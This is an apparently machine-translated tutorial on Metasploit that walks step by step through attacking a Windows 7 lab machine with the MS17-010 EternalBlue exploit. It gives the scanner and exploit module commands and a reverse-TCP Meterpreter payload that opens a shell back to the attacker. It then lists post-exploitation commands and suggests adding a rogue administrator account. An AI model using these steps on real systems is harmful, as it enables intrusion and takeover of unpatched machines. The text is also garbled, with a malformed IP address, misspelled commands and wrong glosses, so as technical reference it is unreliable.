Introduction of a Matesploit
Metasploit is a free, downloadable framework, you can easily get through it, and the development of computer software vulnerabilities to carry out attacks. Which itself comes with hundreds of known software vulnerabilities professional-grade tools exploits. When HD Moore released Metasploit In 2003, computer security has also been permanently altered. As if overnight, anyone can become a hacker, everyone can use attack tools to attack those who have not patched or just patched vulnerabilities. Software vendors can no longer delay the release of a patch for the vulnerability has been announced, and this is because the Metasploit team has been working to develop a variety of attack tools, Metasploit and their contribution to all users.
MSF two basic module
Three msf exploit Process
Scanning drone
[Auxiliary use / Scanner / SMB / smb_ms17_010]
[SET the rhosts 192.1683.139.140] - Set to scan the host ip address
[exploit] - begin to attack
select exploit
[use exploit / Windows / SMB / ms17_010_eternalblue] - using Module Attack
[show options] ---- view the need to set parameters
[set rhosts 192.168.139.140] - set attack the host ip address
[set lhosts 192.168.139.153] - set attacking host ip address
[set threads 512] - attack the host ip settings address
Select payload
[SET payload Windows / x64-/ Meterpreter / reverse_tcp] - Set the machine to bounce
Attack
[exploit] - began to attack
Four Ms17-010 Eternal Blue exploits
Attack: Kali-Linux-2019.4-vmware -amd64 (IP: 192.168.139.153)
drone: Windows 7 X64 (IP: 192.168.139.140 )
[shell]
[whami]
[systeminfo]
[ipconfig]
Then you can add the user to modify the password Add to super administrators group